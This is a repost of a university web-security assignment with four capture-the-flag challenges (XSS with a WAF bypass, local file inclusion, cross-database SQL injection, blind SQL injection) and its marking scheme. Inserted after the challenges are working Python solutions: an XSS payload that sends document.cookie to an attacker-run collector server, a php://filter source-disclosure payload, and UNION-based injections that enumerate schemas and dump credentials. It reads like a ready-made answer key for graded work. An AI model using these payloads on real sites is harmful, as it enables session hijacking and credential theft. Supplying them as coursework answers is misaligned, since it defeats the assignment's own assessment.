
Tutoring case: COMP90074 Assignment 2

Posted May 15, 2020

School of Computing and Information Systems
COMP90074: Web Security
Assignment 2

Due date: No later than 11:59pm on Sunday 10th May 2020
Weight: 12.5%
Marked out of 100

Note: All challenges have a flag in the format: flag{something_here}

Submission format

All students must submit a single zip file with all their code and a PDF version of their report. The zip must be named <username>-assignment2.zip (e.g. testuser1-assignment2.zip). All code for each challenge must be clearly labelled and stored in a separate file, so it is not confused with the code for other challenges. Finally, all code must be referenced within the report. This implies that there will be code in both the report and the separate code file for each task.

If you have any questions or queries, please feel free to reach out via the discussion board, or by contacting Sajeeb (the lecturer).

Report Writing (5%)

For this assignment, we expect a professionally written report, provided to the client (teaching staff), explaining and specifying each issue, alongside the process of exploitation and steps to reproduce the exploits. Also, please ensure that the flag is displayed in a screenshot at the end of each challenge's write-up. We will not be accepting any flags that are not displayed in a screenshot.

Challenge 1: Basic WAF challenge (22.5%)

sml555 is a 1337 Security Researcher (aka Hacker) who has discovered a serious vulnerability. He decided to create a "Super Secure Blog" to publish his research. In his excitement to publish quickly, he accidentally forgot to fully protect against all XSS vulnerabilities. As a fellow Security Researcher, sml555 has asked you to perform a security assessment on his blog and identify any issues. Please be aware that, being security conscious, sml555 is protecting his blog with a basic WAF. You will need to find a way to bypass the WAF in order to complete this task.

Your task is:
1. Visit the website (http://chall1.unimelb.life)
2. Perform a manual Penetration Test and identify the following vulnerability:
   a. XSS
3. Use the vulnerability to perform the following:
   a. Steal the victim's cookie and authenticate as the victim
4. Document your findings with full details and screenshots so that sml555 can reproduce these findings.

Note: It is critical that the findings are written up clearly and in a reproducible manner. Without this write-up you will receive 0 marks for this section. If in doubt, please ask the lecturer prior to the due date.

Scope
- Testing must only be performed on http://chall1.unimelb.life
- Testing must be manual only. Manual tools may be used (Burp, ZAP, etc.); however, you may not use the automated scanning capabilities of these tools.
- No automated scanning or automated tools can be used.
- No load testing, denial of service (DoS) or distributed denial of service (DDoS) attacks.

HINT: Take a look at the marking scheme for the process to complete this challenge!

Challenge 2: Local File Inclusion (20%)

In true Agile fashion, a junior developer at !SlowDevs Pty Ltd. created a local copy of the Agile Manifesto for easy accessibility on the organisation's intranet. Due to inexperience, the junior developer accidentally exposed the website to the internet. To accommodate the international teams, the developer has added a language translation layer to the web application. Prior to placing this website in the production environment, !SlowDevs Pty Ltd. has contracted you to perform a security assessment of the new website.

Your task is:
1. Visit the website (http://chall2.unimelb.life)
2. Perform a manual Penetration Test and identify the following vulnerability:
   a. LFI
3. Use the vulnerability to perform the following:
   a. Steal the configuration file
4. Document your findings with full details and screenshots so that !SlowDevs Pty Ltd. can reproduce these findings.

Note: It is critical that the findings are written up clearly and in a reproducible manner. Without this write-up you will receive 0 marks for this section. If in doubt, please ask the lecturer prior to the due date.

Scope
- Testing must only be performed on http://chall2.unimelb.life
- Testing must be manual only. Manual tools may be used (Burp, ZAP, etc.); however, you may not use the automated scanning capabilities of these tools.
- No automated scanning or automated tools can be used.
- No load testing, denial of service (DoS) or distributed denial of service (DDoS) attacks.

HINT: Take a look at the marking scheme for the process to complete this challenge!

Challenge 3: SQL Injection from another DB (22.5%)

Entrepreneurs Я Us saw a growing market for supplying white hat hackers with hacking tools. Being entrepreneurs, they realised that they needed to be quick to market and have rapidly developed a webstore branded "31337 Store". Unfortunately, while being quick to market makes good business sense, it meant that they took some shortcuts during the development and testing process, and therefore have left a few vulnerabilities in their code. Entrepreneurs Я Us has hired you as a security consultant to perform a penetration test on "31337 Store" prior to their big go-live event planned on the 10th of May.

Your task is:
1. Visit the website (http://chall3.unimelb.life)
2. Perform a manual Penetration Test and identify the following vulnerability:
   a. SQL Injection
3. Use the vulnerability to perform the following:
   a. Extract the CPanel credentials and find the flag
4. Document your findings with full details and screenshots so that Entrepreneurs Я Us can reproduce these findings.

Note: It is critical that the findings are written up clearly and in a reproducible manner. Without this write-up you will receive 0 marks for this section. If in doubt, please ask the lecturer prior to the due date.

Scope
- Testing must only be performed on http://chall3.unimelb.life
- Testing must be manual only. Manual tools may be used (Burp, ZAP, etc.); however, you may not use the automated scanning capabilities of these tools.
- No automated scanning or automated tools can be used.
- No load testing, denial of service (DoS) or distributed denial of service (DDoS) attacks.

HINT: Take a look at the marking scheme for the process to complete this challenge!

Challenge 4: Blind SQL Injection (30%)

VISION®, a large database company, has created an admin backend for one of their clients to self-manage their database. As this backend was created using completely new code, VISION® has hired you as a security consultant to perform a penetration test on this admin backend and confirm whether it is secure or not.

Your task is:
1. Visit the website (http://chall4.unimelb.life)
2. Perform a manual Penetration Test and identify the following vulnerability:
   a. SQL Injection
3. Use the vulnerability to perform the following:
   a. Extract credentials
   b. Log into the application and find the flag
4. Document your findings with full details and screenshots so that VISION® can reproduce these findings.

Note: It is critical that the findings are written up clearly and in a reproducible manner. Without this write-up you will receive 0 marks for this section. If in doubt, please ask the lecturer prior to the due date.

Scope
- Testing must only be performed on http://chall4.unimelb.life
- Testing must be manual only. Manual tools may be used (Burp, ZAP, etc.); however, you may not use the automated scanning capabilities of these tools.
- No automated scanning or automated tools can be used.
- No load testing, denial of service (DoS) or distributed denial of service (DDoS) attacks.

HINT: Take a look at the marking scheme for the process to complete this challenge!

Note: For this challenge, we expect a single, end-to-end exploit (written in python3) that performs the blind SQL injection and extracts the credentials. This script will then authenticate into the application and extract the flag.
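Challenge 1 asks for the cookie to be stolen and then replayed. The piece of that which is worth scripting is the attacker-side collector: the injected payload makes the victim's browser load an "image" from a host you control, carrying document.cookie in the query string, and the collector records it. The following is an added example, not part of the assignment or of sml555's blog; the payload form (a bare img tag with an onerror handler) and the replay target are assumptions, since which tag and handler get past the blog's WAF is exactly what the challenge asks you to find by hand. The victim request is simulated locally so the script runs offline.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, quote, urlparse

# 1x1 transparent GIF, so the exfiltration request looks like an ordinary image load
# in the victim's browser rather than a broken resource.
PIXEL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04\x01\x00\x00\x00\x00"
             b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def build_payload(listener_url: str) -> str:
    """XSS payload that sends document.cookie to the listener.
    Assumption: the blog lets an <img> with an onerror handler through; which tag,
    attribute or encoding survives a given WAF is target-specific and found manually."""
    return ('<img src=x onerror="(new Image).src=\'%s/?c=\'+encodeURIComponent(document.cookie)">'
            % listener_url)


class CookieCollector(BaseHTTPRequestHandler):
    captured = []  # (client address, cookie string); shared by every handler instance

    def do_GET(self):
        cookie = parse_qs(urlparse(self.path).query).get("c", [""])[0]
        if cookie:
            CookieCollector.captured.append((self.client_address[0], cookie))
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL_GIF)))
        self.end_headers()
        self.wfile.write(PIXEL_GIF)

    def log_message(self, *args):  # keep per-request console logging quiet
        pass


def start_listener(host: str = "127.0.0.1", port: int = 0):
    """Run the collector on a background thread; port 0 lets the OS pick a free port."""
    server = ThreadingHTTPServer((host, port), CookieCollector)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def simulate_victim_hit(listener_url: str, cookie: str) -> bytes:
    """Constructed stand-in for the victim's browser executing the payload (offline runs only)."""
    with urllib.request.urlopen(f"{listener_url}/?c={quote(cookie)}") as resp:
        return resp.read()


def replay_request(target_url: str, stolen_cookie: str) -> urllib.request.Request:
    """Step 3 of the task: reuse the captured session by sending it back as the Cookie header."""
    return urllib.request.Request(target_url, headers={"Cookie": stolen_cookie})


if __name__ == "__main__":
    server, port = start_listener()
    print("inject this into the blog:", build_payload(f"http://127.0.0.1:{port}"))
    print(f"listening on port {port}; Ctrl-C to stop")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        server.shutdown()
```

For the real engagement the listener must be reachable from the victim's browser (so bind to a public address and put that host in build_payload), and the cookie you replay is only useful while the victim's session is live and the cookie is not HttpOnly; a cookie the browser refuses to expose to script never reaches document.cookie, which is why the capture list staying empty is itself a finding.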
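Challenge 2's marking scheme distinguishes "extract any PHP file (server-side content)" from merely proving the LFI. The reason is that include() executes a .php file, so pointing the vulnerable parameter at config.php shows you its output, not its source. The standard way round that is the php://filter stream wrapper with convert.base64-encode, which makes PHP read the file through the filter and hand back the encoded bytes without executing them; decoding happens on your side. The following is an added example, not the assignment's or !SlowDevs' code: the web root, the parameter name lang and the file names are constructed, and the "server" is a small emulation of the include behaviour, not PHP.

```python
import base64
import re
from urllib.parse import urlencode

# Constructed stand-in for the target's web root; not the real chall2 files.
FAKE_WEBROOT = {
    "en.php": "<?php $greeting = 'Welcome'; ?>\n<h1><?php echo $greeting; ?></h1>\n",
    "config.php": "<?php\n$db_host = 'localhost';\n$db_user = 'agile';\n$db_pass = 's3cret';\n"
                  "// flag{example_only}\n",
}

FILTER_PREFIX = "php://filter/"


def simulated_include(include_arg: str) -> str:
    """Emulates a page doing include($_GET['lang']) with no validation.

    - A plain file name is 'executed': PHP blocks are dropped and only the surrounding
      markup survives. (Real PHP runs the code; this emulation only hides it, which is
      the property that matters: a direct include of config.php shows the tester nothing.)
    - php://filter/convert.base64-encode/resource=<file> (the read=... spelling is accepted
      too) returns the file's bytes after the filter, with nothing executed. That is
      standard PHP wrapper behaviour."""
    if include_arg.startswith(FILTER_PREFIX):
        spec, _, resource = include_arg[len(FILTER_PREFIX):].partition("resource=")
        filters = spec.replace("read=", "").strip("/")
        if filters != "convert.base64-encode":
            raise ValueError("emulation only supports convert.base64-encode")
        source = FAKE_WEBROOT.get(resource)
        return "" if source is None else base64.b64encode(source.encode()).decode()
    source = FAKE_WEBROOT.get(include_arg)
    if source is None:
        return ""  # PHP would log a warning; either way the file contents are not shown
    return re.sub(r"<\?php.*?(?:\?>|\Z)", "", source, flags=re.S)


def filter_payload(target_file: str) -> str:
    """The value to put in the vulnerable parameter."""
    return f"{FILTER_PREFIX}convert.base64-encode/resource={target_file}"


def lfi_request_url(base_url: str, param: str, target_file: str) -> str:
    """The URL a tester would send; the parameter name is an assumption for the example."""
    return f"{base_url}?{urlencode({param: filter_payload(target_file)})}"


def recover_source(response_body: str) -> str:
    """Client side: undo the base64 step to get the original server-side file."""
    return base64.b64decode(response_body).decode()


def demo():
    """Direct include leaks nothing; the filter-wrapped include leaks the whole file."""
    direct = simulated_include("config.php")
    wrapped = simulated_include(filter_payload("config.php"))
    return direct, recover_source(wrapped)


if __name__ == "__main__":
    direct, source = demo()
    print("direct include returned:", repr(direct))
    print("recovered source:\n" + source)
    print("request URL:", lfi_request_url("http://chall2.unimelb.life/", "lang", "config.php"))
```

When you reproduce this against a real target, paste the raw base64 into the report and decode it in a screenshot: the encoded blob is what proves the read happened without execution, and the decoded file is what contains the credentials or flag.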
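Challenge 3 is marked in stages: prove the injection, identify the CPanel database name and its tables, leak the credentials, then log in. The point of "from another DB" is that the injection point lives in the store's database but the database account behind it can read a second schema on the same server, so a UNION-based injection can name that schema and pull rows out of it with db.table notation. The following is an added example, not the assignment's or the store's code: it uses an in-memory SQLite connection with a second database ATTACHed as cpanel to stand in for the second schema, and the product/user data is constructed. The MySQL spelling of each enumeration query is given in the comments.

```python
import sqlite3


def build_store() -> sqlite3.Connection:
    """Constructed stand-in for the shop's database connection (not the real chall3 schema).
    'main' holds the store; a second database is ATTACHed as 'cpanel' so that the same
    connection, and therefore the same injection point, can read it. On MySQL the analogue
    is one DB account holding SELECT on more than one schema."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, price TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(1, "Rubber Ducky", "49.99"), (2, "WiFi Pineapple", "99.99")])
    con.execute("ATTACH DATABASE ':memory:' AS cpanel")
    con.execute("CREATE TABLE cpanel.users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO cpanel.users VALUES (1, 'admin', 'flag{example_only}')")
    return con


def search_vulnerable(con, term: str):
    """The bug: the search term is spliced into the SQL text, so it is parsed as SQL."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return con.execute(sql).fetchall()


def search_fixed(con, term: str):
    """The fix: the term travels as a bound parameter and cannot change the query's shape."""
    return con.execute("SELECT name, price FROM products WHERE name LIKE ?",
                       (f"%{term}%",)).fetchall()


# Each payload: a term that matches nothing, a UNION with the same column count (2) as
# the original SELECT, and a trailing '--' that comments out the rest of the query.

def list_databases(con):
    # MySQL: ' UNION SELECT schema_name, '' FROM information_schema.schemata--
    rows = search_vulnerable(con, "zzz' UNION SELECT name, file FROM pragma_database_list--")
    return sorted(name for name, _ in rows)


def list_tables(con, db: str):
    # MySQL: ' UNION SELECT table_name, '' FROM information_schema.tables WHERE table_schema='<db>'--
    rows = search_vulnerable(
        con, f"zzz' UNION SELECT name, sql FROM {db}.sqlite_master WHERE type='table'--")
    return sorted(name for name, _ in rows)


def dump_credentials(con, db: str, table: str):
    # MySQL: ' UNION SELECT username, password FROM <db>.<table>--
    return search_vulnerable(con, f"zzz' UNION SELECT username, password FROM {db}.{table}--")


def exploit(con):
    """Chain the stages: find the other database, list its tables, read the credentials."""
    other = [d for d in list_databases(con) if d not in ("main", "temp")][0]
    tables = list_tables(con, other)
    creds = dump_credentials(con, other, tables[0])
    return other, tables, creds


if __name__ == "__main__":
    con = build_store()
    print("proof of injection:", search_vulnerable(con, "zzz' OR '1'='1"))
    print("other database, tables, credentials:", exploit(con))
    print("same payload against the fixed search:",
          search_fixed(con, "zzz' UNION SELECT username, password FROM cpanel.users--"))
```

Two things carry over to the real target unchanged: the UNION only works once you have matched the column count of the original SELECT (find it with ORDER BY n or by adding NULL columns), and the column names you SELECT from the other database come from the table-enumeration stage, so do not guess them.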
Marking Scheme

Report Writing (5%)

Challenge 1: Basic WAF challenge (22.5%)
Task / Subtask                                                   Percentage awarded on full completion   Accumulated percentage
Identify XSS (includes WAF bypass)                               50%                                      50%
Steal victim's cookie                                            25%                                      75%
Authenticate as victim                                           25%                                      100%

Challenge 2: Local File Inclusion (20%)
Task / Subtask                                                   Percentage awarded on full completion   Accumulated percentage
Identify LFI                                                     15%                                      15%
Extract any PHP file (server-side content) from the server using LFI   50%                                65%
Steal flag config file using LFI                                 35%                                      100%

Challenge 3: SQL Injection from another DB (22.5%)
Task / Subtask                                                   Percentage awarded on full completion   Accumulated percentage
Identify SQL injection (prove with screenshot)                   30%                                      30%
Identify CPanel database name and tables                         20%                                      50%
Leak credentials from CPanel database                            35%                                      85%
Authenticate into CPanel and find the flag                       15%                                      100%

Challenge 4: Blind SQL Injection (30%)
Task / Subtask                                                   Percentage awarded on full completion   Accumulated percentage
Identify blind SQL injection (prove with screenshot)             30%                                      30%
Identify users database table using blind SQL injection          25%                                      55%
Leak a victim user's password                                    30%                                      85%
Authenticate as the victim user and retrieve the flag            15%                                      100%
